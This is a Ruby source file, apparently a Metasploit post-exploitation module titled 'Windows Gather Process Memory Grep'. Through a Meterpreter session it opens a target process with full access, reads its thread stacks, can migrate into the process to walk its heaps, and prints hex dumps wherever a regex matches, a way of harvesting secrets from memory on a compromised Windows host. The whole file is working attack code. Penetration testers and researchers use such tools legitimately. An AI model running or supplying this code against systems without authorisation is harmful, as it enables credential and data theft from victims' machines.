metasploit-gs/modules/post/windows/gather/memory_grep.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Process Memory Grep',
        'Description' => %q{
          This module allows for searching the memory space of a process for potentially
          sensitive data.  Please note: When the HEAP option is enabled, the module will have
          to migrate to the process you are grepping, and will not migrate back automatically.
          This means that if the user terminates the application after using this module, you
          may lose your session.
        },
        'License' => MSF_LICENSE,
        'Author' => ['bannedit'],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_migrate
              stdapi_railgun_api
              stdapi_sys_process_attach
              stdapi_sys_process_getpid
              stdapi_sys_process_memory_query
              stdapi_sys_process_memory_read
              stdapi_sys_process_thread_open
            ]
          }
        }
      )
    )
    register_options([
      OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),
      OptRegexp.new('REGEX', [true, 'Regular expression to search for with in memory', nil]),
      OptBool.new('HEAP', [false, 'Grep from heap', false])
    ])
  end

  def get_data_from_stack(target_pid)
    proc = client.sys.process.open(target_pid, PROCESS_ALL_ACCESS)
    stack = []
    begin
      threads = proc.thread.each_thread do |tid|
        thread = proc.thread.open(tid)
        esp = thread.query_regs['esp']
        addr = proc.memory.query(esp)
        vprint_status("Found Thread TID: #{tid}\tBaseAddress: 0x%08x\t\tRegionSize: %d bytes" % [addr['BaseAddress'], addr['RegionSize']])
        data = proc.memory.read(addr['BaseAddress'], addr['RegionSize'])
        stack << {
          'Address' => addr['BaseAddress'],
          'Size' => addr['RegionSize'],
          'Handle' => thread.handle,
          'Data' => data
        }
      end
    rescue StandardError
    end

    stack
  end

  def get_data_from_heap(target_pid)
    # we need to be inside the process to walk the heap using railgun
    heap = []
    if target_pid != client.sys.process.getpid
      print_status("Migrating into #{target_pid} to allow for dumping heap data")
      session.core.migrate(target_pid)
    end
    proc = client.sys.process.open(target_pid, PROCESS_ALL_ACCESS)

    heap_cnt = session.railgun.kernel32.GetProcessHeaps(nil, nil)['return']
    dheap = session.railgun.kernel32.GetProcessHeap()['return']
    vprint_status('Default Process Heap: 0x%08x' % dheap)
    ret = session.railgun.kernel32.GetProcessHeaps(heap_cnt, heap_cnt * 4)
    pheaps = ret['ProcessHeaps']

    idx = 0
    handles = []
    while idx != pheaps.length
      vprint_status('Found Heap: 0x%08x' % pheaps[idx, 4].unpack('V')[0])
      handles << pheaps[idx, 4].unpack('V')[0]
      idx += 4
    end

    print_status('Walking the heap... this could take some time')
    heap = []
    handles.each do |handle|
      lpentry = "\x00" * 42
      ret = ''
      while (ret = session.railgun.kernel32.HeapWalk(handle, lpentry)) && ret['return']
        entry = ret['lpEntry'][0, 4].unpack('V')[0]
        pointer = proc.memory.read(entry, 512)
        size = ret['lpEntry'][4, 4].unpack('V')[0]
        data = proc.memory.read(entry, (size == 0) ? 1048576 : size)
        if !data.empty?
          heap << {
            'Address' => entry,
            'Size' => data.length,
            'Handle' => handle,
            'Data' => data
          }
        end
        lpentry = ret['lpEntry']
        break if (ret['GetLastError'] == 259) || (size == 0)
      end
    end

    heap
  end

  def dump_data(target_pid)
    regex = datastore['REGEX']

    get_data_from_stack(target_pid).each do |mem|
      idx = mem['Data'].index(regex)

      next if idx.nil?

      print_status('Match found on stack!')
      print_line
      data = mem['Data'][idx, 512]
      addr = mem['Address'] + idx
      print_line(Rex::Text.to_hex_dump(data, 16, addr))
    end

    # Grep from heap is optional.  If the 'HEAP' option isn't set,
    # then let's bail.
    return unless datastore['HEAP']

    get_data_from_heap(target_pid).each do |mem|
      idx = mem['Data'].index(regex)

      next if idx.nil?

      print_status('Match found on heap!')
      print_line
      data = mem['Data'][idx, 512]
      addr = mem['Address'] + idx
      print_line(Rex::Text.to_hex_dump(data, 16, addr))
    end
  end

  def run
    if session.type != 'meterpreter'
      print_error 'Only meterpreter sessions are supported by this post module'
      return
    end

    print_status("Running module against #{sysinfo['Computer']}")

    proc_name = datastore['PROCESS']

    # Collect PIDs
    pids = []
    client.sys.process.processes.each do |p|
      pids << p['pid'] if p['name'] == proc_name
    end

    if pids.empty?
      print_error("No PID found for #{proc_name}")
      return
    end

    print_status("PIDs found for #{proc_name}: #{pids * ', '}")

    pids.each do |pid|
      print_status("Searching in process: #{pid}...")
      dump_data(pid)
      print_line
    end
  end
end